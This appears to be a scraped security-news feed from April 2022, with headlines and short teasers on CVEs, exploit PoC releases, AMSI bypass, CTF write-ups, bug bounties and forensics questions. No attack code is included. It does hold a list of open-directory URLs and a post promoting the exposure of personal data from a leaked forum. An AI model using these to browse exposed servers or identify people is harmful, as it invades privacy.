    Cars and cars interiors
    https://tumakina.com/files/ submitted by /u/shaburushaburu [link] [comments]
    Can I post private apis here?
    I have developed a niche hobby of finding private APIs of different web apps by grokking in devtools. It's pretty simple but I find it very satisfying. Is there a dedicated subreddit where people post such stuff? This is the closest one I could find but it is related to open directories, not APIs. In case there isn't a dedicated subreddit, can I post it here instead for people to discuss? submitted by /u/GullibleEngineer4 [link] [comments]
  • Open

    [Writeup]Hacktoria — Operation Runner
    This is the process my team and I took in solving this CTF! Continue reading on Medium »
    15 best and free computer forensic tools
    In this article, I decided to collect programs that will help you in conducting investigations and will be free at the same time. Continue reading on Medium »
    War in Ukraine / April 12
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Decrypt passwords and improve photo quality
    I wanted to share several tools designed to recover passwords or texts hidden by pixels: Depix (https://github.com/beurtschipper/Depix)… Continue reading on Medium »
    Personal security in Telegram investigations
    Let’s talk about personal security measures when conducting investigations in Telegram. They will be useful to you in other online… Continue reading on Medium »
  • Open

    Social Hunter
    Crawls the given URL and finds broken social media links that can be hijacked. Broken social links may allow an attacker to conduct… Continue reading on Medium »
    [2/3] XSS Through The Front-Door @ GitLab
    Sometimes XSS flaws are met with shrugs. They’re an incredibly common vulnerability in web applications even today with so many… Continue reading on Medium »
  • Open

    Citrix SDWAN Hard-Coded Credentials
    submitted by /u/k1dney [link] [comments]
    TallGrass: An AV exclusion enumeration tool written in Python
    submitted by /u/UnwearableCactus [link] [comments]
    Around 50,000 GitHub credentials leaked as metadata inside commits
    submitted by /u/gid0rah [link] [comments]
    OpenSSH 9 released on 2022-04-08. By default it uses NTRU algorithm which is believed to resist attacks enabled by future quantum computers.
    submitted by /u/mstromich [link] [comments]
    A real PoC for CVE-2022-21907 RCE DoS IIS
    submitted by /u/yoursisterboy [link] [comments]
  • Open

    SecWiki News 2022-04-13 Review
    Thoughts and practice on cultivating research-oriented data science talent by ourren. For more of the latest articles, visit SecWiki
  • Open

    Coercing NTLM Authentication from SCCM
    submitted by /u/dmchell [link] [comments]
  • Open

    Critical security vulnerability fixed in Elementor (5M+ WordPress Installs)
    Article URL: https://patchstack.com/articles/critical-vulnerability-fixed-in-elementor-plugin/ Comments URL: https://news.ycombinator.com/item?id=31014804 Points: 1 # Comments: 0
    Remote Procedure Call Runtime Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809 Comments URL: https://news.ycombinator.com/item?id=31012416 Points: 4 # Comments: 0
    Microsoft patches zero-day RCE vulnerability with CVE score of 9.8
    Article URL: https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/ Comments URL: https://news.ycombinator.com/item?id=31012226 Points: 1 # Comments: 0
    Git security vulnerability announced
    Article URL: https://github.blog/2022-04-12-git-security-vulnerability-announced/ Comments URL: https://news.ycombinator.com/item?id=31009675 Points: 523 # Comments: 256
  • Open

    Coercing NTLM Authentication from SCCM
    tl;dr: Disable NTLM for Client Push Installation Continue reading on Posts By SpecterOps Team Members »
    Start learning pentesting/hacking: The Red Team
    Useful materials for those who are starting to learn pentesting/hacking. All materials checked by myself. Continue reading on Medium »
  • Open

    Heap Exploitation for Homo sapiens.
    No content preview
    Arming the Use-After-Free()
    No content preview
    ROP Chains on ARM
    No content preview
    Integer Overflows in ARM
    No content preview
    Invoking mprotect() using ROP Chains in ARM
    No content preview
    500$ Bug: Sensitive Data Exposure to Broken Access Control leads, How I able to take over any…
    No content preview
    P1 Vulnerability: How I chained Logical-Error to Account-Takeover Vulnerability ‍that No-One…
    No content preview
    How hackers impersonate email-id’s : Email Spoofing and Phishing Attacks
    No content preview
    How a YouTube Video lead to pwning a web application via SQL Injection worth $4324 bounty
    No content preview
    Android Pentesting Setup On Macbook M1
    No content preview
  • Open

    [Security Bulletin] Microsoft April 2022 Patch Tuesday fixes multiple high-severity vulnerabilities
    Recently, Microsoft released the April 2022 security patches, fixing 119 vulnerabilities across 53 Microsoft products, including 47 privilege escalation vulnerabilities, 47 remote code execution vulnerabilities, 13 information disclosure vulnerabilities, and 9 denial-of-serv...
  • Open

    EU officials may have been targeted by Israeli Pegasus spyware
    According to the latest Reuters report, senior EU officials have been targeted by the notorious Pegasus spyware.
    FreeBuf Morning Report | Hashnode blogging platform has an LFI vulnerability; new hackers steal US$600,000 worth of cryptocurrency
    With the help of ESET and Microsoft researchers, Ukrainian officials say they successfully thwarted a cyberattack on an energy facility.
    LockBit ransomware gang lurked in a US government network for months
    Security researchers found that a US regional government agency hit by LockBit ransomware had the gang hiding in its network for at least five months before the payload was deployed.
    HP Teradici PCoIP affected by vulnerability, 15 million endpoints impacted
    Teradici is affected by the recently disclosed OpenSSL certificate parsing vulnerability, which causes an infinite denial-of-service loop.
    Imperva's latest report: consumers are growing numb to the risk of data breaches
    According to Imperva's latest research, consumers' trust in the companies they do business with is at an all-time low, leading many to "give up" on security.
    Notes from a hands-on packet signature reversing exercise
    This article mainly describes the process of finding the signature algorithm and automating the signing.
    Dark web market RaidForums taken down in one sweep
    In the law enforcement operation, the 21-year-old founder and chief administrator of RaidForums was also arrested.
    Automated network traffic analysis based on machine learning
    This article focuses on the general problem of automated network traffic analysis, aiming to let researchers devote more effort to optimizing models and features.
  • Open

    Microsoft patches zero-day RCE vulnerability with CVE score of 9.8
    Article URL: https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/ Comments URL: https://news.ycombinator.com/item?id=31012226 Points: 1 # Comments: 0
  • Open

    Cos: Blockchain Dark Forest Selfguard Handbook
    Author: SlowMist Security Team. Original link: https://mp.weixin.qq.com/s/A2XQEWlH25o8YsWjwCz2HQ Preface: Blockchain is a great invention; it has brought about changes in certain relations of production and partially solved the precious problem of "trust". But reality is harsh, and people hold many misconceptions about blockchain. These misconceptions let bad actors easily exploit loopholes and frequently reach into people's wallets, causing massive financial losses. This has long been a dark forest. Based on this, SlowMist...
  • Open

    JTAG/Chip-Off Resources
    Hi community… I’m wondering if I can make a DIY lab for JTAG/Chip-Off but stuck at what needs to be the minimum items to have to perform JTAG/Chip-Off … JTAG/Chip-Off is quite similar to Hardware Reverse Engineering … so what would be the useful resources to get started with … Any mentioned article or book or tools would do great … Thanks submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    Exposing Personally Identifiable Information Behind A Recently Leaked Russian High-Profile Cybercriminal Forum Community - An Analysis
    I've decided to share some personally identifiable information behind a recently leaked high-profile Russian cybercrime-friendly forum community with the idea to assist everyone in their current and future cyber attack or cyber campaign attribution efforts.Sample personally identifiable information courtesy of a recently leaked high-profile Russian cybercrime-friendly forum community:djamix@
    It's Full of Secrets and User-Generated Sensitive and Classified Information - An Update on Some Current Projects
    It used to be a moment when "rocking the boat" while travelling was a monthly routine and when sticking to the basic methodology that "sharing is caring" and that "if it's going to be massive it better be good" was the everyday mentality for a new generation of baby boomers who would eventually end up inspiring the next generation Y which is by the way a secret that you should be extremely

  • Open

    Blue team scripts you use on red team engagements?
    I feel like I could do better at reports for clients. Besides shots of hash dumps, cracks, shares, AD trees, etc, I like to run winpeas and screenshot it, but the output is a little long for screenshots. Can anyone recommend any good blue team scripts that offer good output for reports? submitted by /u/hpliferaft [link] [comments]
    Tired of SANS. Any other good training/certification programs?
    I have 7 SANS certs (1 a year) and I get unlimited cloud vendor training/cert attempts from my employer. Any suggestions for non-SANS, and non-Azure/AWS training? submitted by /u/m0lware [link] [comments]
    Are Java updates cumulative from a security standpoint ?
    Hello all, sysadmin trying to learn some basic security here. Currently I am looking at this CVEdetails page on Java vulns; it mentions Java 8 update 311 is vulnerable to a specific vuln. My question is, would Java 8u301 be vulnerable as well? My understanding is: CVEdetails, various advisories and Oracle themselves never explicitly mention that other v8 updates are affected. But maybe it's because Java updates fundamentally always are backwards-compatible, so it's basically a fundamental given and I missed this info? I know vuln scans exist and Wazuh, Greenbone and OpenCVE all return simply nothing on this software, but we all know vuln scans are not the perfect holy grail either; I'd rather just know how the hell Oracle approaches this. Maybe this better fits r/AskProgramming, but since it's more specifically on the security side I start here. Thanks for any answers. submitted by /u/YetAnotherSysadmin58 [link] [comments]
    Open Source tool for code/data leakage
    I'm looking to find open source tools (or low-cost) that can scan common places on the internet where people might upload my company's data accidentally or maliciously. I'm interested in scanning places like github/bitbucket/etc for code, as well as pastebin/other random sites for bulk data. I haven't gotten much farther than google dorks and github searches thus far. Any good tools out there? submitted by /u/tophersmith [link] [comments]
    network forensic analysis challenge
    Hi, I am looking for some network forensic challenges/puzzles, like getting a .pcap file and trying to determine what happened, or from which IP, and so on. I found netresec.com. Lots of pcaps there, especially about the MACCDC competitions, but it is not clear to me WHAT the "challenge" is, or even if there is one; I mean maybe they provide very realistic pcap files and it is necessary to understand what happened on the wire without any clue at all. Any other suggestions? Thank you! submitted by /u/g-simon [link] [comments]
    IT Consultant to CyberSecurity Field?
    I am an IT management consultant at one of the biggest shops in the world. Think tier 2.. I am currently an entry level MC working as a trainer with a govt focused cloud architecture. I have close to two years of experience in the field and want to know my prospects for transitioning in the Cyber Security Field; and what types of roles are available to someone transitioning from IT Management Consulting? submitted by /u/nyulspboy [link] [comments]
    Can a webpage access any part of an extension from the browser?
    For example, LastPass the browser extension has the user log in with their master password in the extension window, which can have any webpage loaded in the browser at the same time. Is it possible for a malicious webpage to be able to interact with the extension such that it can read what is being input? What ability if any do web pages have to access extensions in the browser? Is it one way? i.e. Extensions can affect a webpage but not the other way around? Or is the extension model included in the DOM items that a webpage can interact with? submitted by /u/JamieOvechkin [link] [comments]
    No prior knowledge. No IT background. About 3 years to learn. Too much to dream?
    So, basically... is it worth pursuing the bug bounty path? I am looking for a side hustle (maybe one day a full job?) and I have around 3 years to spare while maintaining my actual job. Is it feasible? Or would you choose another thing to pursue? *same question asked in the bb subreddit. submitted by /u/_sephi_ [link] [comments]
  • Open

    Earning $$$ without any hacking, Most interesting OTP Bypass
    Want to see how I managed to get OTP Bypass without any hacking? Give it a shot and read my story! Continue reading on Medium »
    Earning $$$ without any hacking, Most interesting OTP Bypass
    Want to see how I managed to get OTP Bypass without any hacking? Give it a shot and read my story! Continue reading on InfoSec Write-ups »
    Compromise domain with NoPac exploit
    During the last pentesting in client infra, we compromised a domain with CVE-2021–42287/CVE-2021–42278(noPac) exploits. Continue reading on Medium »
    Euler launches a $1 million ImmuneFi Bug Bounty program!
    The ImmuneFi Bug Bounty program aims to strengthen Euler's security while also deepening collaboration with the broader DeFi ecosystem as part of our… Continue reading on Medium »
    Broken session control leads to access the admin panel even after revoking the access!! — #ZOHO
    Hey Guys, Continue reading on Medium »
    CVE-2021–4034
    CVE-2021–4034 Local privilege escalation Continue reading on Medium »
    AlbusSec:- Penetration-List 05 Cross-Site-Scripting (XSS) — Part 3
    Hello Medium folk, I hope you enjoyed our previous articles, so now on this article You’ll learn about Types of Cross-Site-Scripting… Continue reading on Medium »
    Nexus Mutual Community Renews Bounty Matching Program With $600k War Chest
    The Nexus Mutual community has just voted to continue its bug bounty matching program with Immunefi and increase the size of the war chest… Continue reading on Immunefi »
    Immunefi Matching Bug Bounty Program: Renewal and Expansion
    Nexus Mutants recently approved the renewal and expansion of the Immunefi matching bug bounty program by a unanimous vote. Funding for the… Continue reading on Nexus Mutual »
  • Open

    OSINT TOOLS 2022 THE MOST COMPREHENSIVE LIST OF SOURCES FOR THE OSINT SERVICE.
    PROJECT : ADVISOR B&M LLC (NEW PROJECT)! Continue reading on Medium »
    War in Ukraine / April 11
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    Tarrask malware uses scheduled tasks for defense evasion - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]
    Tarrask malware uses scheduled tasks for defense evasion
    submitted by /u/SCI_Rusher [link] [comments]
    Mythic C2 Framework Introduction Video
    Introduction To Mythic C2 - YouTube submitted by /u/luzunov [link] [comments]
    Up to 100k GitHub credentials leaked...
    submitted by /u/dmchell [link] [comments]
    Some insights into offensive security from ex Facebook red teamer
    Recently recorded this podcast with a CTO in cybersecurity (my boss) and a former offensive security engineer at Facebook (currently enterprise architect at ReliaQuest) about red teaming and offensive security. There is some interesting insight into ethical red teaming, internal vs external teams and getting the business on board with the whole process. Give it a listen if you'd like. https://open.spotify.com/episode/1BuzVj8Md3K4O7OAkuHrdM submitted by /u/AgentLessBots [link] [comments]
  • Open

    CVE-2022-22965 – Spring RCE (which does NOT impact spinnaker)
    Article URL: https://www.armory.io/blog/cve-2022-22965-spring-rce-which-does-not-impact-spinnaker/ Comments URL: https://news.ycombinator.com/item?id=31008467 Points: 2 # Comments: 0
    Git v2.35.2 and below for CVE-2022-24765
    Article URL: https://lore.kernel.org/git/xmqqv8veb5i6.fsf@gitster.g/ Comments URL: https://news.ycombinator.com/item?id=31008416 Points: 4 # Comments: 0
  • Open

    Russian Malware Targeting Ukrainian Energy Sector
    submitted by /u/entropydaemon5 [link] [comments]
    The Security Risks of Open Source Dependencies and Some npm Flaws That Leverage Them
    submitted by /u/mkatch [link] [comments]
    Round Two: An Updated Universal Deserialisation Gadget for Ruby 2.x-3.x
    submitted by /u/Gallus [link] [comments]
    CVE-2022-25165: Privilege Escalation to SYSTEM in AWS VPN Client
    submitted by /u/rhino_security_labs_ [link] [comments]
  • Open

    Process Hollowing (Mitre:T1055.012)
    Introduction In July 2011, John Leitch of autosectools.com talked about a technique he called process hollowing in his whitepaper here. Ever since then, many malware The post Process Hollowing (Mitre:T1055.012) appeared first on Hacking Articles.
    Defense Evasion: Process Hollowing (Mitre:T1055.012)
    Introduction In July 2011, John Leitch of autosectools.com talked about a technique he called process hollowing in his whitepaper here. Ever since then, many malware The post Defense Evasion: Process Hollowing (Mitre:T1055.012) appeared first on Hacking Articles.
  • Open

    Git Security Vulnerability Announced
    Article URL: https://github.blog/2022-04-12-git-security-vulnerability-announced/ Comments URL: https://news.ycombinator.com/item?id=31006060 Points: 34 # Comments: 11
  • Open

    SecWiki News 2022-04-12 Review
    Blockchain Dark Forest Self-Rescue Handbook by ourren; Analyzing the Spring Framework RCE from Scratch by ourren; OLa: a Cobalt Strike post-exploitation module plugin by ourren; Overview of U.S. Cybersecurity Awareness Education Initiatives by ourren; DecoyMini: an intelligent emulation and attack-trapping (honeypot) tool by ourren; The four lines of defense of classified protection (MLPS), graded protection, critical infrastructure protection and cryptographic evaluation safeguarding network information security by ourren. For more of the latest articles, visit SecWiki.
  • Open

    Understanding and Defending Against Reflective Code Loading on macOS
    This blogpost will describe the concept of loading executables in-memory on macOS and how to detect it. Continue reading on Medium »
    Home-Grown Red Team: Internal Windows Phishing With Pickl3 And InsideMan
    Let’s assume that you’ve sent your phishing email, found an external RCE exploit that led to internal network access, or whatever method… Continue reading on Medium »
    CrowSec EdTech Write-Up: Poisoning
    In this article, I will demonstrate how to resolve this CTF (Capture the Flag), this challenge is a lab and is available in the CrowSec… Continue reading on Medium »
  • Open

    I made a subreddit for FTP Open Directories.
    I made one so there wouldn't need to be any FTP sites here. r/OpenFTP submitted by /u/ilikemacsalot [link] [comments]
    Notes, Assignments, Question Papers and Study Materials from VMOU (India) [English + Hindi]
    A lot of Study materials, Question papers, Assignments from VMO University, India. Probably left Open on Purpose for students, thus anyone can access. Majority of the content is in Hindi, as well as English, on multiple Subjects/Fields. http://assets.vmou.ac.in/ submitted by /u/amritajaatak [link] [comments]
    Minecraft Mod OD? (I’m not sure)
    Mod for Minecraft kind of interesting OD if anyone wants to try this mod please say if it’s good or not ;) Have fun! https://www.csse.canterbury.ac.nz/greg.ewing/minecraft/mods/SGCraft/doc/Programs/ submitted by /u/Salty_Ad_69 [link] [comments]
    LLOD 04-12-22 (Large List Of Open Directories)
    http://dev.stoneybrooke.com/ https://packages.bic.mni.mcgill.ca/ https://opensource.wandisco.com/ https://www.song.ac.th/song_web58/images/ http://188.165.227.112/ http://www.figuresworld.net/movies_tv/ http://www.cs.cmu.edu/afs/cs/Web/People/libra-demo/ http://www.frontiernet.net/~mardenz/ http://nerfhaven.com/forums/public/style_avatars/ http://tee.tucows.com/ http://tee.linux.tucows.com/ http://www.jeepwrangler.net/ http://ftp.cs.stanford.edu/ http://www.danslagle.com/mac/ http://www.danslagle.com/mac/iMovie/data/ http://www.healthfreedomusa.org/downloads/iMovie.app/ http://www.sfu.ca/~bvaid/ http://test.scripts.psu.edu/users/ http://brbfinanzag.ch/ http://ftpmirror.your.org/ http://ftpmirror.your.org/pub/misc/apple/ https://www.life.illinois.edu/ming/iWeb.app/ http://202.74.40.12/ http://mail.i-sams.com/ Pastebin of both LLODs: https://pastebin.com/QtuNUVry Also don't look at this: http://www.frontiernet.net/~mardenz/Shrek/Shrek.svg submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Counter XSS with Spring Cloud Gateway
    Prerequisites Continue reading on System Weakness »
    Counter XSS with Spring Cloud Gateway
    Prerequisites Continue reading on Medium »
  • Open

    ZAP HUNT Remix
    There is a tool I have been using happily for a long time: HUNT! Among analysis methods I also prefer Data Driven Testing, so I was making very good use of the HUNT scripts. Then I learned about work called HUNT Remix, which converts the existing script-based approach in ZAP and Burp Suite into add-on form, and I have now switched my own HUNT usage to the add-on form as well. Today I will briefly explain what HUNT is and then talk about how to install and use the Remix version of the add-on. HUNT+DDT: this is a tool I introduced once before, in 2018; it accompanies the talk Jason Haddix gave at DEF CON 25.
  • Open

    A brief look at Windows telemetry: CIT aka Customer Interaction Tracker - a source of forensic data on at least Windows version till 7
    submitted by /u/digicat [link] [comments]
    Cellebrite free alternatives?
    Hi everyone, is there any free (and hopefully open source) alternative to Cellebrite for Mobile Forensics? submitted by /u/zr0_day [link] [comments]
    A small advice for a first DFIR setup
    I've gotten a lot of questions about my setup for digital forensics and incident response in the last several months, so I decided to start my blog with an article on it. Suggestions and enhancements are always appreciated. https://www.dfirblog.com/yet-another-setup-for-dfir-investigations/ submitted by /u/samaritan_o [link] [comments]
    BSSID and Cell ID values offline database for PA
    Hello, sometimes online enrichment of BSSID and cell IDs from PA (versions 7.49 and 7.54) fails for me. Does anybody have the full DB for doing this offline, to download it? Also, does anybody know how to use open databases such as Alexander Mylnikov's databases or the RADIOCELLS.ORG ones? Thanks submitted by /u/PaleAbbreviations648 [link] [comments]
  • Open

    Regular Expression Denial of Service vulnerability
    Reddit disclosed a bug submitted by dingleberryfarts: https://hackerone.com/reports/1538157
    RCE via WikiCloth markdown rendering if the `rubyluabridge` gem is installed
    GitLab disclosed a bug submitted by vakzz: https://hackerone.com/reports/1401444 - Bounty: $3000
  • Open

    IAM Your Defense Against Cloud Threats: The Latest Unit 42 Cloud Threat Research
    We present research highlights and recommendations for defense against cloud threats from Unit 42’s Cloud Threat Report: IAM the First Line of Defense The post IAM Your Defense Against Cloud Threats: The Latest Unit 42 Cloud Threat Research appeared first on Unit42.
  • Open

    FreeBuf Morning Report | Open-source community calls for stronger routing security; Singapore implements a strict cybersecurity licensing regime
    The Federal Communications Commission should consider implementing comprehensive testing and fines to ensure that Internet service providers take at least minimal measures to protect the global Internet routing system from malicious attacks.
    Mirai malware actively exploiting the Spring4Shell vulnerability
    Recent research shows that the Mirai malware is exploiting the Spring4Shell vulnerability to infect vulnerable web servers and carry out DDoS (distributed denial-of-service) attacks.
    Fox News exposes 13 million sensitive records online
    The exposed data contains roughly 13 million web content management records, accessible to any Internet user at any time.
    U.S. VA adds more than $100 million to its cybersecurity budget, with a focus on implementing zero trust
    The VA is requesting an increase of more than $100 million in its cybersecurity budget for fiscal year 2023, with particular attention to implementing zero-trust preventive measures and security architecture.
    Anonymous hacker group breaches the Russian Ministry of Culture and leaks 446 GB of data
    The hacker group Anonymous breached the Russian Ministry of Culture and leaked 446 GB of data originating from the ministry through the DDoSecrets platform.
    FreeBuf Morning Report | Weibo and other platforms announce crackdown on pandemic-related rumors; open-source platform npm boycotts Russian developers
    Several commercial website platforms issued announcements stating that the relevant illegal and non-compliant information and accounts would be dealt with severely.
  • Open

    DeFi Hack 通关学习
    Author: 0x9k. This article is a contributed submission; Seebug Paper looks forward to your contributions, and every accepted submission receives a gift! Submission email: paper@seebug.org. Preface: DeFi Hack is a wargame abstracted from vulnerabilities that have appeared in real-world DeFi, used to improve learners' skills in discovering and exploiting DeFi smart contract vulnerabilities [1]. May The Force Be With You. Challenge description: the goal of this level is to ... from MayTheForceB...
  • Open

    Deconstructing Programs for Compiler Fuzzing
    Article URL: https://comby.dev/blog/2022/04/11/comby-decomposer-compiler-fuzzing Comments URL: https://news.ycombinator.com/item?id=30998620 Points: 7 # Comments: 0

  • Open

    [Python]: Add Server-side Request Forgery sinks
    GitHub Security Lab disclosed a bug submitted by someonenobbd: https://hackerone.com/reports/1538144
  • Open

    Burp Suite functionality... But in a web browser?
    Is this a thing? I can't install things on my work laptop and sometimes I just want to check what HTTPS is doing. submitted by /u/pooshitfartcoomer [link] [comments]
    BurpSuite Vuln Help
    Performed a scan using BurpSuite on an app where I work. Got this and not sure what the actual impact is? External Service Interaction (DNS) alert. PortSwigger documentation doesn't help. submitted by /u/DoctorPaxel [link] [comments]
    Remote pentesting with a team
    What’s the best way to run a remote pentest where we send a host to the client and have multiple people accessing the host? In the past I’ve used VMware shared devices but that is now deprecated. Any thoughts? Thanks! submitted by /u/yeahivapebro [link] [comments]
    What could be the reason why an SSH server would return a high-byte packet back to a malicious public IP?
    Srcport was 22 and the destport was a high number. But the bytes sent was about 1140 bytes. I have experimented myself before and a failed ssh login normally just records less than 50 bytes. I don't have access to the ssh logs on the server. What kind of attack will make an ssh server reply back with such a big byte size? submitted by /u/Ecstatic_Constant_63 [link] [comments]
    Decrypting (and formatting) an external HDD when you know the password?
    Hey, so I have no idea if I just bricked my HDD. I encrypted it using Veracrypt and was able to mount it just fine, until I accidentally forgot to mount it using Veracrypt one day and right clicked on it instead and selected "format". Ever since, I haven't been able to mount it using Veracrypt. How might I go about decrypting and/or formatting it? submitted by /u/856850835 [link] [comments]
    Studying for CompTIA Security+
    Hi, Is anyone here who studied for Security+ and used https://globalcerts.training ? This site comes up everywhere on the web as an ad. submitted by /u/Dodge-Sw [link] [comments]
    Successful virtualization on M1 ARM host and cybersec Linux distros?
    Has anyone had recent success running any cybersec Linux distros as VMs on ARM-based macs? If so, which distro and which virtualization software was used? I see Kali being supported and developed, but was wondering if any others work. Thanks. submitted by /u/cho--e [link] [comments]
    Suspected DNS hijack, how to go about this?
    Not knowledgeable in netsec by any means; I'm studying web dev so I know the basics. I suspect my router's DNS has been hijacked; I think the attacker is serving me a fraudulent google.com. I had a shenanigan that made me suspect this, but would rather not go into details as I'm trying to keep this post simple. I know it is unlikely someone would go out of their way to do this, but I want to make sure. How can I check that my gateway modem's/devices' DNS have not been tampered with? I tried dnsleaktest but just my ISP's nameservers show up. Is it possible that an attacker would be able to prevent the malicious DNS from showing up when doing a test like this? Thanks submitted by /u/Far-Veterinarian9464 [link] [comments]
    Phishing email detection, analysis, and response
    Have to admit phishing email is a top security concern in the company. There are already lots of successful products such as KnowBe4, Cofense, Mimecast, etc. The email vendor has its own phishing tools/solutions, e.g. Office 365 Defender. I am still seeing new products coming up such as Tessian and Abnormal Security gaining traction. Are they solving a new problem, or are they still solving the same problem with really breakthrough new solutions? submitted by /u/Calm_Scene [link] [comments]
  • Open

    AWS RDS Vulnerability Leads to AWS Internal Service Credentials
    Article URL: https://blog.lightspin.io/aws-rds-critical-security-vulnerability Comments URL: https://news.ycombinator.com/item?id=30996426 Points: 3 # Comments: 0
    Access control vulnerability in EA exposed sensitive personal data
    Article URL: https://portswigger.net/daily-swig/access-control-vulnerability-in-easy-appointments-platform-exposed-sensitive-personal-data Comments URL: https://news.ycombinator.com/item?id=30991997 Points: 1 # Comments: 0
  • Open

    AWS RDS Vulnerability Leads to AWS Internal Service Credentials
    submitted by /u/freakwin [link] [comments]
    CI/CD Goat - A deliberately vulnerable CI/CD environment (CTF)
    submitted by /u/TupleType1 [link] [comments]
    Semgrep ruleset for C/C++ vulnerability research
    submitted by /u/0xdea [link] [comments]
    Hackers Exploiting Spring4Shell Vulnerability to Deploy Mirai Botnet Malware. This is far from the first time the botnet operators have quickly added newly publicized flaws to their exploit toolset. Last year, multiple botnets were uncovered leveraging Log4Shell to breach susceptible servers.
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Pythonic Malware: Evading Detection with Compiled Executables
    Creating Python executables during an offensive security engagement used to be an effective method of evasion. However, this tactic has… Continue reading on InfoSec Write-ups »
    Hacking Instagram Scammers
    No content preview
    SVG SSRFs and saga of bypasses
    Hi all, hope you are keeping well and staying safe. This blog is about my recent experiences with SVG, HTML to PDF SSRF, and bypasses for… Continue reading on InfoSec Write-ups »
    Server-Side Request Forgery (SSRF) Explained
    No content preview
    Complete Guide To Start Bug Bounty In 2022
    No content preview
    TryHackMe: Blaster
    No content preview
    THM: Attacktive Directory
    No content preview
  • Open

    A Detailed Guide on AMSI Bypass
    Introduction Windows developed the Antimalware Scan Interface (AMSI) standard that allows a developer to integrate malware defense in his application. AMSI allows an application to The post A Detailed Guide on AMSI Bypass appeared first on Hacking Articles.
  • Open

    Untitled
    Hello my friends, how are you? I hope you are well. Continue reading on Medium »
    Euler launches a $1M ImmuneFi bug bounty program!
    The ImmuneFi Bug Bounty program aims to strengthen Euler's security while developing collaboration with the broader… Continue reading on Medium »
    Types of Steganography methods that are used for hiding confidential data.
    > Are the images really safe? Continue reading on Medium »
    Spring4Shell
    Spring4Shell and Spring Cloud RCE vulnerability Scanner Continue reading on Medium »
    [1/3] Brute-Force Protection Bypass @ GitLab
    This is the first of three reports describing my findings from a review I did of Gitlab around 6 months ago. I thought I’d start with the… Continue reading on Medium »
    SVG SSRFs and saga of bypasses
    Hi all, hope you are keeping well and staying safe. This blog is about my recent experiences with SVG, HTML to PDF SSRF, and bypasses for… Continue reading on InfoSec Write-ups »
    cilocks-android-lockscreen-bypass
    CiLocks — Android LockScreen Bypass Features Continue reading on Medium »
    pyWhat — Identify Anything. Easily Lets You Identify Emails, IP Addresses, And More…
    The easiest way to identify anything pip3 install pywhat && pywhat --help What is this? Continue reading on Medium »
    Lazyrecon — Tool To Automate Your Reconnaissance Process In An Organized Fashion
    Fashion Continue reading on Medium »
    nexfil-osint-tool-for-finding-profiles-by-username
    NExfil is an OSINT tool written in python for finding profiles by username. The provided usernames are checked on over 350 websites within… Continue reading on Medium »
  • Open

    War in Ukraine / April 10
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Identification of the WEX terrorist
    On November 28, 2019, one of the largest waves of virtual mining in Russia began… Continue reading on Medium »
    Analysis of advertising counters on websites
    Today I will talk about the study of unique advertising identifiers on the site and their applicability for use in OSINT research… Continue reading on Medium »
    Useful Chrome browser extensions
    We automate OSINT research using useful extensions for the Chrome browser. The Wayback Machine extension… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-11 Review
    List of software programs and vendors aimed at protecting personal privacy by 雨苁; A checklist of 300+ tips for protecting digital security and privacy in 2022 by 雨苁; SecWiki Weekly (Issue 423) by ourren; CS-Notes by ourren; Exploiting and fixing flawed APIs in smart home platforms by ourren; Using the communication protocol to reverse-monitor C&C servers by Avenger. For more of the latest articles, visit SecWiki.
  • Open

    Does anyone here have experience with the EnCase CFSR?
    Doing searches I can find a lot on the ENCE but nothing on the CFSR (besides their official material) despite it being their other major cert. Anyone taken this? How does it compare to the ENCE and other similar certs? submitted by /u/Winter-Obligation276 [link] [comments]
    Windows 7 Vulnerable for MS17-010
    Hi there! I am currently working on a project where I am trying to examine and verify network traffic from "EternalBlue SMB Remote Windows Kernel Pool Corruption" from Metasploit, where it is exploiting MS17-010. The problem is that I can't find any Windows 7 that is vulnerable and isn't patched for it yet. Anyone have any tips and ideas? Thanks! submitted by /u/Odylicous [link] [comments]
    Windows Hibernation Files - A Look Back in Time
    Good morning, It’s time for a new 13Cubed episode! I'm sure you've seen hiberfil.sys on Windows systems for years. But, how much do you really know about Windows Hibernation? We'll start with the basics and look at the original concepts behind this technology. We'll then look at how it has changed throughout the evolution of Windows, and discuss the artifact's current forensic value as of today (the "Why should I care?" part). Lastly, we'll take a look at Hibernation Recon, one of the most capable tools available to help us parse these files. Episode: https://www.youtube.com/watch?v=Kbw1sDJb61g Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed submitted by /u/13Cubed [link] [comments]
    AccessData FTK Imager - Memory Capture Failed - Cannot Start Driver
    I am running a Windows 11 VM on Parallels on my MacBook Pro 14" M1 Pro and am trying to perform a memory capture on AccessData FTK Imager 4.7.1.2 and am receiving a "Could Not Start Driver" dialog box and "Memory Capture Failed" in the Memory Progress box. I tried these things below to resolve the problem but got the same outcome: - Ran AccessData FTK Imager as administrator - Disabled driver signature enforcement through Windows admin cmd prompt - Disabled driver signature through boot up troubleshooting prompt - Enabled debug logging on FTK imager but the only thing that shows up is " [FTK Imager.cpp:271]: Imager logging initialized" after the memory capture fails. Nothing else populates the log. I tried this same thing on an old 2013 MacBook Pro i5 running a Windows 10 VM on Parallels and it works, so I am assuming it has to do with the ARM drivers on my machine. submitted by /u/joshmobillybo [link] [comments]
  • Open

    Trends in Web Threats: Attackers Were More Active During Holiday Season
    We analyzed hundreds of thousands of incidents of malicious host URLs in order to identify recent trends in web threats, what they target and how. The post Trends in Web Threats: Attackers Were More Active During Holiday Season appeared first on Unit42.
  • Open

    Process Injection using CreateRemoteThread API
    submitted by /u/tbhaxor [link] [comments]
  • Open

    MIIT and four other departments issue the "Guiding Opinions on Further Strengthening the Construction of Safety Systems at New Energy Vehicle Enterprises"
    The Opinions consist of 8 chapters and 22 articles; Chapter 7, "Improving the Cybersecurity Assurance System", focuses on strengthening cybersecurity protections.
    Hacker group NB65 attacks Russia with a modified version of Conti ransomware
